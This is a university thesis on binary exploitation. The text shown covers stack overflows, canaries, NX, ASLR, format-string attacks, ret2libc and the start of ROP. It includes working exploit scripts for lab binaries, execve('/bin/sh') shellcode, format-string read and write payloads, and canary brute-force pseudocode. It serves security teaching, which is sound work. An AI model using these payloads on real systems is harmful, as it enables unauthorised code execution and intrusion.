Bufferoverflow

Bachelor's thesis
BACHELOR'S DEGREE IN COMPUTER ENGINEERING

Facultat de Matemàtiques i Informàtica
Universitat de Barcelona
BINARY EXPLOITATION:
Memory corruption
Author: Oriol Ornaque Blázquez
Advisor: Raúl Roca Cánovas

Carried out at: Departament de Matemàtiques i Informàtica
Barcelona, June 20, 2021

Abstract
Binaries, or programs compiled down to executables, might come with errors or bugs that could trigger behavior unintended by their authors. By carefully understanding the environment where programs get executed, the instructions and the memory, an attacker can craft a specific input, tailored to trigger these unintended behaviors and gain control over the original logic of the program. One of the ways this can be achieved is by corrupting critical values in memory.
This work focuses on the main techniques to exploit buffer overflows and other memory corruption vulnerabilities in binaries. A proof of concept for CVE-2021-3156 is also presented, with an analysis of its inner workings.
Contents
1 Stack overflows
1.1 The stack
1.1.1 Stack frame
1.1.2 Overflowing the stack
1.2 Basic overflow
1.3 Shellcode injection
2 Stack overflow countermeasures
2.1 Stack canaries
2.1.1 Check for canaries
2.1.2 Bypassing stack canaries
2.2 NX/DEP/W⊕X
2.2.1 Check for NX
2.3 ASLR/PIE
2.3.1 Check for ASLR/PIE
3 Format strings
3.1 Format functions
3.2 Format string vulnerability
3.3 Format string exploits
3.3.1 Arbitrary read
3.3.2 Arbitrary write
4 Return-oriented programming
4.1 ret2libc
4.2 ROP
4.2.1 ROP Gadgets
4.3 Stack pivoting
4.4 ret2dlresolve
4.4.1 Structures
4.4.2 Symbol resolution
4.5 Sigreturn-oriented programming
4.5.1 Signal handler mechanism
4.5.2 sigcontext struct
4.5.3 SROP
5 Heap exploits
5.1 The heap
5.2 glibc malloc
5.2.1 Common terms
5.3 Heap overflows
5.4 Use-After-Free
5.5 Double free
5.6 Unlink
6 Fuzzing
6.1 Introduction
6.2 Code coverage
6.3 Types of fuzzers
6.3.1 Input seed
6.3.2 Input structure
6.3.3 Program knowledge
7 Practical case
7.1 CVE-2021-3156
7.1.1 Weakness
7.1.2 Bug
7.1.3 Exploitation
A CVEs and CWEs
A.1 CVE Program
A.1.1 CVE IDs
A.1.2 CNAs
A.2 CWE Program
Bibliography
Chapter 1
Stack overflows
1.1 The stack

The most common way for CPUs to implement procedure or subroutine calls is by means of a stack[6]. Thanks to its last-in first-out nature, the stack is a simple and effective solution to keep track of the order of the calls: when you call a subroutine, you push the address of the next instruction onto the stack, and once the subroutine has finished executing you can return to where you left off by popping the previously pushed address. The address of the next instruction pushed on the stack is called the return address.
void do_something() {
    do_something_a();
    // 2
    do_something_b();
    // 3
}

int main() {
    do_something();
    // 1
    return 0;
}
Operation   Stack after the operation (top first)
(start)     empty
push @1     @1        (main calls do_something)
push @2     @2, @1    (do_something calls do_something_a)
pop @2      @1
push @3     @3, @1    (do_something calls do_something_b)
pop @3      @1
pop @1      empty
Figure 1.1: Simplified stack timeline
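The timeline can be replayed with a short Python sketch. A plain list stands in for the hardware stack, and the labels @1, @2 and @3 are the return addresses marked in the listing; the function name replay is only illustrative.

```python
def replay(operations):
    """Apply push/pop operations and record the stack after each one."""
    stack = []
    history = []
    for op, address in operations:
        if op == "push":
            # A call pushes the return address.
            stack.append(address)
        else:
            # A return pops it; it must be the most recently pushed address.
            assert stack.pop() == address
        history.append(list(stack))
    return history


timeline = [
    ("push", "@1"),  # main calls do_something
    ("push", "@2"),  # do_something calls do_something_a
    ("pop", "@2"),   # do_something_a returns
    ("push", "@3"),  # do_something calls do_something_b
    ("pop", "@3"),   # do_something_b returns
    ("pop", "@1"),   # do_something returns to main
]

history = replay(timeline)
for (op, address), state in zip(timeline, history):
    print(op, address, "->", state)
```

Each pop only ever needs the most recent entry, which is why a last-in first-out structure is enough to track nested calls.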
This stack lives in the main memory of the computer alongside the code and the data. On Intel x86 and x86_64 CPUs it is controlled by two registers: the stack pointer and the base pointer.
1.1.1 Stack frame

The stack holds much more information than just the execution path that the program has taken. It also holds local variables, the base pointer saved before the call, and subroutine arguments and return values (this may vary between calling conventions).
To group all the data associated with a subroutine call we use the term stack frame. It is composed of the following components (in push order):
1. Parameters of the subroutine. In 64-bit Linux, the default calling convention specifies that the first 6 integer or pointer parameters are passed in registers instead of on the stack.
2. Return address.
3. Saved base pointer of the caller.
4. Locals of the subroutine.
The stack drawn in Figure 1.2 is an example of a stack frame for the foo procedure.
C source:
void foo(int arg)
{
    int a;
}

int main()
{
    foo(1);

    return 0;
}

Assembly:
foo:
    push ebp
    mov ebp, esp
    sub esp, 4
    ...

main:
    ...
    push 1
    call foo
    ...

Stack layout, from low to high addresses (a, saved bp, saved ip and arg form foo's stack frame):
0x00...00
a
saved bp
saved ip
arg
0xff...ff
Figure 1.2: Standard C 32-bit calling convention stack layout
1.1.2 Overflowing the stack

Now that we know that the stack contains a mix of modifiable variables and critical data like the return address, an important question arises:
Can we modify the return address? Indeed.

Consider the stack in Figure 1.3. It has a local variable called buffer that spans n bytes. If we fill that buffer with n+1 bytes, the excess byte will partially overwrite the saved base pointer (bp). To overwrite the return address we just need to fill the buffer with n + sizeof(bp) + sizeof(ip) bytes.
When the processor finishes executing the subroutine, it pops the return address and sets the instruction pointer register to that value, executing the bytes found at that address as code. By choosing precise values for the return address we can redirect code execution wherever we want.
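The byte counts above can be checked with a few lines of Python. This is a minimal sketch that assumes the buffer sits directly below the saved base pointer, with no padding or other locals in between, as in Figure 1.3; the helper name frame_offsets is hypothetical.

```python
def frame_offsets(n, word_size):
    """Return (offset of saved bp, offset of saved ip, bytes needed to cover both).

    Offsets are counted from the first byte of the buffer.
    """
    saved_bp = n                  # first byte past the buffer
    saved_ip = n + word_size      # sizeof(bp) bytes later
    total = n + 2 * word_size     # n + sizeof(bp) + sizeof(ip)
    return saved_bp, saved_ip, total


print(frame_offsets(64, 4))  # 64-byte buffer in a 32-bit frame
print(frame_offsets(64, 8))  # 64-byte buffer in a 64-bit frame
```

Real frames often contain extra locals or alignment padding, so the offsets have to be confirmed in a debugger before they are relied on.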
0x00...00
buffer      (writes into buffer advance toward higher addresses)
saved bp
saved ip
0xff...ff
Figure 1.3: Buffer on the stack
1.2 Basic overflow

To do a basic stack overflow I recommend using a premade environment with all the protections disabled, so that we can focus on the basic exploit. For this first example, I will use the virtual machine Phoenix found at exploit.education, specifically the level Stack4.
/* ... */
void complete_level() { /* win function */
    printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
    exit(0);
}

void start_level() {
    char buffer[64]; /* buffer on the stack */
    void *ret;

    gets(buffer); /* vulnerable function */

    ret = __builtin_return_address(0);
    printf("and will be returning to %p\n", ret);
}

int main(int argc, char **argv) {
    printf("%s\n", BANNER);
    start_level();
}
Figure 1.4: Stack4@Phoenix
This level is a ret2win exercise. The code contains a win function, complete_level, that is never called but is present in the binary. The goal is to execute that function by overwriting the return address so that it points to complete_level. To achieve the stack overflow we need to input more data than expected, so that we overflow the buffer on the stack and overwrite the return address. There are a few functions in the C Standard Library that do not perform bounds checking on the input received: in this particular case, we are presented with the function gets. A quick look at the man page of that function reveals the vulnerability in the Bugs section.
Figure 1.5: man 3 gets: Bugs section
We need to supply gets with the following data:
1. 64 bytes of junk for the buffer
2. 8 bytes of junk for the ret local variable
3. 8 bytes of junk for the stack alignment padding[6]
4. 8 bytes of junk for the saved base pointer
5. 8 bytes with the address of complete_level for the return address
To find the address of complete_level we can use a debugger like gdb.

A simple Python 2.7 script will do the job.
Listing 1.1: stack4_exploit.py
exploit = "\x41" * 64 # for the buffer
exploit += "\x41" * 8 # for the ret local var
exploit += "\x41" * 8 # for stack alignment padding
exploit += "\x41" * 8 # for the rbp
exploit += "\x1d\x06\x40\x00\x00\x00\x00\x00" # address of complete_level in little-endian
print exploit
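The listing relies on Python 2.7 treating str as raw bytes. As a hedged sketch of the same layout in Python 3, the payload can be built from bytes objects, with struct.pack producing the little-endian address. The constant 0x40061d is simply the value encoded by the last line of the listing and will differ for other builds of the level.

```python
import struct
import sys

COMPLETE_LEVEL = 0x40061D  # value encoded in the listing; build-specific

payload = b"A" * 64                            # buffer
payload += b"A" * 8                            # ret local variable
payload += b"A" * 8                            # stack alignment padding
payload += b"A" * 8                            # saved rbp
payload += struct.pack("<Q", COMPLETE_LEVEL)   # return address, 64-bit little-endian

if __name__ == "__main__":
    # Write raw bytes: print() would encode the payload as text.
    sys.stdout.buffer.write(payload + b"\n")
```

Using struct.pack avoids hand-reversing the address bytes, which is an easy place to make a mistake.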
And we are done.
Figure 1.6: Exploiting Stack4
Some last thoughts on why that exploit was possible:
- We knew in advance the address where complete_level was loaded.
- No bounds checking was performed on the user input.
- There was nothing checking the integrity of the stack frame.

1.3 Shellcode injection

In the last exploit we returned to the win function to solve the challenge. In the general case, however, we want to achieve arbitrary code execution, not just return to functions already present in the binary. This can be done by passing as input the machine code of the instructions we would like to execute and overwriting the return address to point to wherever that machine code is stored, thus injecting and executing the shellcode. Take a look at the next exercise: Stack5 from the Phoenix VM.
/* ... */

void start_level() {
    char buffer[128];
    gets(buffer);
}

int main(int argc, char **argv) {
    printf("%s\n", BANNER);
    start_level();
}
The program is very similar to Stack4: a buffer on the stack and a call to gets, which we know is vulnerable to overflows. In the last exploit, almost all of our input was just junk bytes. In this exploit, we are going to use that junk space to store the shellcode, and the return address will point to the start of the shellcode.
If the last exploit was called ret2win because we returned to the win function, this exploit could be named ret2stack or ret2buffer because we will be returning to the buffer on the stack.
You could assemble your own shellcode manually, but I am going to use this shellcode found
at shell-storm.org that performs an execve("/bin/sh").
The format of the input to gets will be:
1. 27 bytes of shellcode
2. 128 − len(shellcode) bytes of NOPs to fill the buffer
3. 8 bytes of NOPs for the saved base pointer
4. 8 bytes with the address of the start of the buffer, where our shellcode is located
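The four parts of this input can be assembled by a small helper. The sketch below is written in Python 3 and uses a 27-byte placeholder instead of real shellcode; the helper name build_payload and the buffer address 0x7fffffffe000 are hypothetical values chosen only to show the layout.

```python
import struct

NOP = b"\x90"


def build_payload(shellcode, buffer_size, buffer_address):
    """Shellcode, NOP fill up to buffer_size, NOPs over saved rbp, return address."""
    if len(shellcode) > buffer_size:
        raise ValueError("shellcode does not fit in the buffer")
    payload = shellcode
    payload += NOP * (buffer_size - len(shellcode))  # fill the rest of the buffer
    payload += NOP * 8                               # saved base pointer
    payload += struct.pack("<Q", buffer_address)     # return to the start of the buffer
    return payload


placeholder = b"\xcc" * 27            # stand-in for the 27-byte shellcode
BUFFER_ADDRESS = 0x7FFFFFFFE000       # hypothetical address, not taken from the VM
layout = build_payload(placeholder, 128, BUFFER_ADDRESS)
print(len(layout))
```

The length check matters because shellcode longer than the buffer would shift the return address away from the slot it is meant to overwrite.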
We replace the junk bytes with NOP opcodes (0x90) because we are now executing instructions on the stack. If the CPU starts executing and finds random bytes, it will raise an invalid opcode exception and the process will be killed. In this particular case it does not matter, because the shellcode is at the beginning and execve replaces the process image, stack included, with the one from /bin/sh. While you are debugging the shellcode and the exploit, however, the NOPs can be essential.
In my gdb debugging session I found the address of the start of the buffer to be 0x7fffffffe490, and so I plugged that number into my exploit script.
exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\
"\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
exploit += "\x90" * (128 - len(exploit))
exploit += "\x90" * 8
exploit += "\x90\xe4\xff\xff\xff\x7f\x00\x00"
print exploit
Inside the debugger the script worked, but outside it failed. Taking a closer look at the error, we can see that the value of the rsp register once we return from start_level is different from the value it had inside the debugger. This offset makes us jump to a wrong address, so instead of our shellcode the CPU tries to execute random bytes, provoking an illegal opcode trap. We have to account for that difference in our script.
Debugged process: shellcode starts at 0x7fffffffe490 (the stack also holds the gdb environment)
Normal process: shellcode starts at 0x7fffffffe4e0
Figure 1.7: Stack offsets between debugged process and non-debugged process
0x...570 − 0x...520 = 0x50

We have to add this offset to the start of the buffer, 0x...490.
0x...490 + 0x50 = 0x...4e0
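The same correction can be done in Python 3, which also yields the little-endian bytes that go into the script. The two constants are the values quoted in the text: the buffer address observed in gdb and the measured 0x50 shift.

```python
import struct

DEBUGGER_BUFFER = 0x7FFFFFFFE490  # start of the buffer as seen inside gdb
STACK_SHIFT = 0x50                # measured difference between the two runs

real_buffer = DEBUGGER_BUFFER + STACK_SHIFT
packed = struct.pack("<Q", real_buffer)

print(hex(real_buffer))
print(packed)
```

The shift depends on the environment of the process, so it has to be measured again if the environment variables or the program path change.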

This problem did not happen in the last challenge because we were not returning to the
stack but to a function in the binary.
Listing 1.2: stack5_exploit.py
exploit = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48"\
"\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
exploit += "\x90" * (128 - len(exploit))
exploit += "\x90" * 8
exploit += "\xe0\xe4\xff\xff\xff\x7f\x00\x00"
print exploit
One last thing. The shell runs in interactive mode by default and it expects to be connected
to stdin. If you do not redirect standard input to the shell, it will close automatically
upon start, so you need to concatenate the python output with standard input and pass
everything to the executable.
Some thoughts on why this exploit was possible:
- We knew in advance the address of the buffer on the stack.
- No bounds checking was performed on the user input.
- There was nothing checking the integrity of the stack frame.
- We could execute instructions stored on the stack.

Chapter 2
Stack overflow countermeasures
2.1 Stack canaries

Stack canaries are secret values placed between local buffers and the return address. The value is checked before a function returns; if it has changed, it has been overwritten and the return address may have been overwritten too, possibly indicating a stack overflow attack. When that happens, the program aborts so that the corrupted return address is never used. The value of the canary changes every time the program starts to make it unpredictable.
This countermeasure is designed to check the integrity of the stack frame, detecting when a possible stack overflow has occurred.
buffer | canary | saved bp | saved ip
Figure 2.1: Stack canary
Figure 2.2: foo function without and with stack canary
Checking a value every time a function returns comes with a performance penalty, and for that reason compilers allow opting out of stack canaries. Compilers usually compile with stack protectors by default. To compile a program without stack canaries in gcc, use the -fno-stack-protector option. Some compilers have options to specify which functions should be compiled with stack canaries, to achieve a trade-off between performance and security.
Figure 2.3: man gcc
2.1.1 Check for canaries

To check for the existence of canaries in a binary we can look at the disassembled code, or we can search for the symbol __stack_chk_fail[8], the function that is called when the canary check fails. Note that grep -q prints nothing; its exit status is 0 when the symbol is found.
readelf -s a.out | grep -q '__stack_chk_fail'
2.1.2 Bypassing stack canaries

Leaking the stack canary
Stack canaries are not bulletproof, though, and can be bypassed. If you include the stack canary value in your input when you overflow the stack, the canary check will not detect the overflow. Note that the canary value in the input must be aligned with the canary on the stack. So to bypass the canary we need to know its value, a value that changes every time the binary is executed. If we could make the binary reveal its memory contents at runtime, we could read the canary value. We have to leak it (see subsection 3.3.1).
Bruteforcing the stack canary
There is also a bruteforce approach for processes that use the POSIX fork function. fork copies the whole process image from the parent to the child, stack canaries included. Therefore, the canary is the same in both the child and the parent. This is useful against programs like web servers that use fork to handle incoming connections. The bruteforce approach consists of guessing the canary one byte at a time.
Listing 2.1: Pseudocode for bruteforcing a canary in a fork program
uint8_t canary[STACK_CANARY_WIDTH];

for(int i = 0; i < STACK_CANARY_WIDTH; ++i)
{
    for(int j = 0; j < 256; ++j)
    {
        canary[i] = j;
        send(buffer + canary[:i+1]); /* only send the first i+1 bytes of the canary */
        if(!fork_child_crashed)
            break;
    }
}
This algorithm reduces the search space from $256^{\text{STACK\_CANARY\_WIDTH}}$ to at most $256 \times \text{STACK\_CANARY\_WIDTH}$ guesses.
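The reduction can be observed in a self-contained simulation. The sketch below does not talk to any process: the forking server is replaced by a hypothetical in-memory oracle (make_oracle) that reports whether a child would survive a given canary prefix, and the names brute_force and CANARY_WIDTH are illustrative.

```python
import os

CANARY_WIDTH = 8


def make_oracle(secret):
    """Simulate a forking server: a child survives only if the guessed prefix matches."""
    attempts = 0

    def survives(prefix):
        nonlocal attempts
        attempts += 1
        return secret[:len(prefix)] == prefix

    def count():
        return attempts

    return survives, count


def brute_force(survives, width=CANARY_WIDTH):
    """Recover the canary one byte at a time, keeping every confirmed byte."""
    known = b""
    for _ in range(width):
        for guess in range(256):
            candidate = known + bytes([guess])
            if survives(candidate):   # the child did not crash: this byte is correct
                known = candidate
                break
    return known


secret = os.urandom(CANARY_WIDTH)
survives, count = make_oracle(secret)
recovered = brute_force(survives)
print(recovered == secret, count())
```

Because every confirmed byte is kept, each position costs at most 256 guesses, so the total never exceeds 256 × 8 = 2048 for an 8-byte canary.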
Bypass using Exception Handling

Another technique to bypass stack canaries consists of triggering an exception before the canary is checked. If the attacker can overwrite an exception handler structure and trigger the exception, an SEH-based stack overflow exploit can be executed[9].
Replace the canary value

Replace the authoritative canary value in the .data section of the program. Because the
canary is computed at runtime the section where it resides must be marked as writable. To
use this technique an arbitrary write is needed.
Arbitrary writes
An arbitrary write implies the ability to write an arbitrary value to an arbitrary memory location marked as writable. This means that we can write values to addresses that are not contiguous to our overflow, giving us the possibility to overwrite the return address without having to overwrite the stack canary.
2.2 NX/DEP/W⊕X
NX is a protection that marks a memory region as non-executable. Different operating systems and architectures provide different mechanisms to implement the same concept. On Microsoft Windows it is called Data Execution Prevention. On BSD systems it is called write ⊕ execute, referring to the rule that no memory section should be marked as writable and executable at the same time. The terms can, and will, be used interchangeably.
In the previous exploit we returned to the stack, where we had loaded instructions. If the stack is marked as non-executable, those instructions cannot be executed: the CPU will raise an exception.
2.2.1 Check for NX

To check for this security feature on a binary we can take a look at the permissions of the section where the stack will be loaded[8]. Again, this depends on the compiler, the OS and the architecture.
readelf -W -l a.out | grep 'GNU_STACK'
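The information that readelf prints here comes from the PT_GNU_STACK program header. As a rough sketch of how that header can be read directly, the Python 3 function below walks the program headers of a 64-bit little-endian ELF image and reports whether the executable flag is set. The function name stack_is_executable is illustrative, and other ELF classes or byte orders are deliberately rejected to keep the example short.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type describing the stack
PF_X = 0x1                 # "executable" bit in p_flags


def stack_is_executable(elf):
    """Return True/False from PT_GNU_STACK, or None if the header is absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF file")
    (e_phoff,) = struct.unpack_from("<Q", elf, 32)             # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)  # entry size and count
    for i in range(e_phnum):
        # In a 64-bit program header, p_type and p_flags are the first two fields.
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

It could be called as stack_is_executable(open("a.out", "rb").read()). When the header is missing the function returns None, because the default stack permissions then depend on the platform.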

2.3 ASLR/PIE
ASLR is the acronym of Address Space Layout Randomization. It is a feature that randomizes the location of the libraries in the process memory, rendering useless attacks with hardcoded addresses, like our second exploit.
Every time an executable is launched, the OS needs to create the process memory space, and the loader loads the dynamic libraries the process requires at certain addresses. Conventionally, those addresses were resolved at compile time and were included in the executable. The executable format contains indications for the OS on how to create its process and where it expects the libraries to be located. As a result, the addresses of the libraries were known and predictable. To make them harder to exploit, the kernel randomizes the location of those libraries every time the executable is executed.
To compile a program without PIE support in gcc, use the -no-pie option.
2.3.1 Check for ASLR/PIE

For ASLR to work, the operating system needs to support it and applications must be compiled with ASLR in mind. Because the load locations are unknown at compile time, the compiler needs to create Position Independent Code or a Position Independent Executable. To check if the OS has ASLR enabled:
cat /proc/sys/kernel/randomize_va_space
# 0 = Disabled
# 1 = Conservative randomization
# 2 = Full randomization
To check if a binary has been compiled with ASLR support[8]:
readelf -h a.out | grep "DYN"
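The DYN value that grep looks for is the e_type field of the ELF header. A minimal Python 3 sketch of the same check reads the first 18 bytes of the file and decodes that field; the function names elf_type and looks_position_independent are illustrative.

```python
import struct

ET_EXEC = 2  # fixed-address executable
ET_DYN = 3   # shared object or position independent executable


def elf_type(header):
    """Return the e_type field from the first bytes of an ELF file."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    endian = "<" if header[5] == 1 else ">"  # EI_DATA: 1 = little-endian, 2 = big-endian
    (e_type,) = struct.unpack_from(endian + "H", header, 16)  # follows the 16-byte e_ident
    return e_type


def looks_position_independent(path):
    """True if the file at path has e_type == ET_DYN."""
    with open(path, "rb") as f:
        return elf_type(f.read(18)) == ET_DYN
```

Shared libraries are also ET_DYN, so this check cannot tell a PIE executable from a library. It only rules out fixed-address executables.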
Additionally, in Linux systems we can use the LD_TRACE_LOADED_OBJECTS environment variable to modify the behavior of the loader, which then prints out the dynamic library dependencies and the addresses where they were loaded at runtime. In systems with ASLR enabled, those addresses will be different each time the same command is executed. In systems where ASLR is disabled, the addresses will always be the same.
Figure 2.4: libc base address loaded at runtime with ASLR enabled/disabled
Chapter 3
Format strings
3.1 Format functions

C uses the concept of format strings to tell some functions how their arguments should be treated. Those functions are unusual in that they take a variable number of arguments, as opposed to the fixed number of arguments that normal functions have in statically typed languages like C. The format string tells the function how to interpret the arguments received. Some examples of this type of function are:
- printf (fprintf, sprintf, vsnprintf, ...)
- scanf (sscanf, fscanf, vfscanf, ...)
These functions are often used to perform input/output with the user. They are conversion functions, representing primitive C data types in a human-readable string representation and vice versa. Vulnerabilities in the input/output functions of a program are a recurrent theme in cybersecurity. The format strings are a critical component of these functions, as they dictate how the arguments should be processed.
Conversion specifier    Meaning
d                       Takes an int from the stack and converts it to signed decimal notation
x                       Takes an unsigned int from the stack and converts it to hex
p                       Takes a void* from the stack and prints it as a hex address
s                       Dereferences a const char* on the stack and reads until null byte
n                       Dereferences an int* on the stack and writes the number of characters written so far
Table 3.1: Common format conversion specifiers
int arg1, arg2, arg4;
char* arg3 = "Hello world";
printf("%x %d %s %n\n", arg1, arg2, arg3, &arg4);
0x0...0
locals
rbp
rip
Address of format string
arg1    <- internal pointer: where the format function starts matching arguments with the format string
arg2
arg3
Address of arg4
0xf...f
Figure 3.1: Format function stack frame
The format function uses an internal pointer to know which argument corresponds to each conversion specified in the format string. This pointer advances as the function parses the format string.
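To make the internal pointer concrete, here is a toy model in Python 3. It is not how libc implements printf: the stack is a plain list of integers, memory is a dictionary keyed by made-up addresses (0x1000, 0x2000), and only the d, x, s and n specifiers from Table 3.1 are handled. All names are hypothetical.

```python
def toy_printf(fmt, stack, memory):
    """Tiny model of a format function: each specifier consumes the next stack slot."""
    out = []
    slot = 0   # the internal argument pointer
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt):
            spec = fmt[i + 1]
            value = stack[slot]
            slot += 1                      # advance to the next argument
            if spec == "d":
                out.append(str(value))
            elif spec == "x":
                out.append(format(value, "x"))
            elif spec == "s":
                out.append(memory[value])  # treat the slot as a pointer to a string
            elif spec == "n":
                memory[value] = len("".join(out))  # store the characters written so far
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


memory = {0x1000: "Hello world", 0x2000: None}
stack = [0xAB, 205, 0x1000, 0x2000]   # arg1, arg2, arg3, address of arg4
output = toy_printf("%x %d %s %n\n", stack, memory)
print(repr(output), memory[0x2000])
```

The model never checks how many arguments the caller really passed: it keeps consuming slots for as long as the format string asks for them.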
3.2 Format string vulnerability

If the format string can somehow be provided by the user, an attacker gains control over the behavior of the format function. Therefore, whenever an attacker is able to provide the format string, a format string vulnerability is present.
int main(int argc, char* argv[]){
    if(argc != 2) return 1;

    printf(argv[1]); /* format string vulnerability */

    return 0;
}
Figure 3.2: Format string vulnerability
3.3 Format string exploits

3.3.1 Arbitrary read
By using the %s conversion specifier we can read from an address stored on the stack. If the input buffer we use is a stack-allocated buffer, we can put any address we want to examine in that buffer and create an appropriate input so that, when the format function parses the %s specifier, it uses our address in the buffer.
int main()
{
    int dummy;
    char buffer[] =
        "AAAAAAAA %x %x %s ";

    printf(buffer, dummy);

    return 0;
}

Stack layout, from low to high addresses:
printf's stack frame:
    rbp
    rip
    buffer's address
    dummy
main's stack frame:
    dummy
    buffer: 0x41 0x41 ...
    rbp
    rip
Figure 3.3: Anatomy of an arbitrary read format string exploit
The %x specifiers are used to make printf's internal argument pointer point to a specific offset, in this case, to our buffer. By adding more %x specifiers we can point further down the stack (higher addresses) and by removing them we point upwards (lower addresses).
When %s is parsed, it dereferences the address pointed to by printf's internal pointer. Thanks to our padding of %x specifiers we made it point to the buffer, where we carefully placed the address we want to read from: 0x4141414141414141.
This technique can be used to leak a stack canary.
Example
In this exercise we are going to read the value of the variable s3cr3t, which is not allocated on the stack. To accomplish this, we need to put the address of s3cr3t at the start of the buffer, followed by format specifiers.
Listing 3.1: exploit.py
exploit = "\x08\x90\x55\x56" # address of s3cr3t
exploit += "_%08x" * 6
exploit += "_%08s"
print exploit

$ python2 exploit.py > qwe
$ ./a.out qwe > asd
As printf parses the format string, the extra format specifiers make the internal pointer point to the start of the buffer, where we carefully stored the address of our target.
Figure 3.4: Address of s3cr3t on the input buffer
The next "%s" will read the address and treat it as a pointer, dereferencing the address and printing the value.
Figure 3.5: Value of s3cr3t leaked
3.3.2 Arbitrary write

We can employ the same technique as in the arbitrary read to overwrite arbitrary memory, but instead of the %s specifier we use the %n specifier, which writes back to an address. %n writes the number of bytes written so far. To control that number we can make use of padding and size modifiers.
Example
To showcase an arbitrary write from a format string I am going to overwrite the return address without affecting the stack canary. I want to return to the win function, which prints win on the screen when executed. This function is not called anywhere in the original code. Compile the code with stack canaries enabled.
Figure 3.6: Compiled with stack canaries
As in the arbitrary read, the first value we put in the input buffer is the address printf should write to, that is, the address of our return address on the stack. In this particular case I inserted that address multiple times in an effort to make the exploit more reliable against stack offsets. The address is then followed by a pad of format specifiers to align the %n specifier with the address at the start of the buffer.
Now we need to set the value we want to write to the selected address. Because %n writes back the number of characters already printed, we can use padding in one of the format specifiers to make it print x characters. The address of win is 0x8049256. To write that value with %n, printf needs to print 134517334 characters, minus those already printed, such as the address and the padding format specifiers.
After the calculation, the number of characters left to print is 134517192.
#exploit = "\x41\x41\x41\x41" * 8
exploit = "\x9c\xd0\xff\xff" * 8 # Address of return address
exploit += "_%08x" * 12
exploit += "_%134517192c"
exploit += "_%n"
print exploit
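The padding width follows from counting every character that printf emits before it reaches %n. The Python 3 sketch below redoes that count for the script above, assuming each %08x prints exactly eight hex digits (which holds for 32-bit values); the variable names are illustrative.

```python
WIN_ADDRESS = 0x8049256             # value that %n must write

address_bytes = 4 * 8               # the 4-byte target address, repeated 8 times
hex_groups = 12 * (len("_") + 8)    # twelve "_%08x" groups: "_" plus 8 hex digits each
separators = len("_") * 2           # the "_" before %...c and the "_" before %n

already_printed = address_bytes + hex_groups + separators
pad_width = WIN_ADDRESS - already_printed

print(WIN_ADDRESS, already_printed, pad_width)
```

If a stack value needed more than eight hex digits, as it can on 64-bit targets, the count would change and the width would have to be recomputed.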
It is important to unset certain environment variables that could move the stack up
and down and make the exploit inconsistent. Running the exploit we execute win().
Figure 3.7: win() function executed.

Chapter 4
Return-oriented programming
4.1 ret2libc
In a traditional stack overflow we try to return to some shellcode in a buffer we control. For this reason, a countermeasure appeared to prevent execution in writable segments (see 2.2). With this limitation, we cannot inject code anymore. The solution is to reuse existing code to achieve our goals, as in the ret2win example (see 1.2). Libc is a library loaded in almost all processes, so returning to a function inside libc is almost always an option. Furthermore, libc provides system, a very well suited win function.
To perform the call to system we need to prepare the stack with the parameters that the compiler would set up for a compiled call to system:
int system(const char* command);
We require the address of command to be present on the stack at a higher address than the overwritten return address, with one word in between for the return address that system itself expects to find.
buffer
ebp
Address of system
Address of command
Figure 4.1: ret2libc stack layout
Example
For this example we will use a custom vulnerable 32-bit program compiled with all the protections disabled and with no debugging symbols, and with ASLR turned off in the operating system.
Listing 4.1: example.c
#include <stdio.h>
#include <stdlib.h>

void vuln()
{
    char buffer[64];
    fgets(buffer, 128, stdin);
}

/* gcc -m32 -fno-stack-protector -no-pie (-m32) main.c */
/* ASLR disabled on host */
int main()
{
    vuln();
    return 0;
}
Using our layout for a ret2libc exploit we need to plug in the addresses of the system function and of a "/bin/sh" string. Because the binary was compiled with no debugging symbols we can't search for the symbol inside gdb or another debugger. But because ASLR is disabled, we know where libc will be loaded. We can take the offset of system from the libc base address to know where it will be located at runtime.
Figure 4.2: libc base address
Figure 4.3: system offset from libc base address
Figure 4.4: "/bin/sh" string offset from libc base address
Knowing all those addresses we can plug them into a python script taking into account how
the stack will unwind and what system expects to be on the stack.
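# Python 2 script: str is a byte string here
exploit = "\x41" * 76            # padding up to the saved return address
exploit += "\x30\xc8\xe0\xf7"    # system address
exploit += "\x00" * 4            # padding (return address slot used by system)
exploit += "\x52\x93\xf5\xf7"    # /bin/sh address
print exploit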
Once we have crafted the exploit we need to concatenate it with stdin to keep access to the
shell (see 1.3).
Figure 4.5: ret2libc exploit
When compiling a binary for 64 bits, the default calling convention used by gcc in Linux
systems is the System V AMD64 ABI, which specifies that the first 6 parameters (integers
or pointers) are passed in registers instead of being pushed on the stack. That represents a
problem for our ret2libc technique, as we only control the stack.
To overcome this issue we will use return-oriented programming, the generalized and refined
form of a ret2anything exploit.
4.2 ROP
Return-oriented programming is a programming paradigm by which an attacker can induce
arbitrary behavior in a program without code injection. This defeats the countermeasure
of NX/DEP/W⊕X.
This technique presents a whole new programming paradigm (an esoteric one): using the
code of an existing program to create another program inside the process, by means of
concatenating return addresses and a stack overflow.
In a typical stack overflow, we overwrite the saved return address with a single address. In
a ROP attack, we write a sequence of addresses instead.
4.2.1 ROP Gadgets

ROP Gadgets are machine code snippets that end with a ret instruction. We can chain them
together by pushing their start addresses in sequence in a stack overflow attack, creating a
ROP chain.
.text
  0x4a0f:   syscall; ret
  0xf0fee:  mov 1, eax; ret
  0x1007f:  mov 0, rsi; ret
  0x4045c:  xor rax, rax; ret
  0x75a0:   pop rdi; ret

Stack (from lower to higher addresses)
  buffer
  rbp
  0x4045c
  0xf0fee
  0x75a0
  0x7fffffff5e70
  0x1007f
  0x4a0f
Figure 4.6: ROP chain
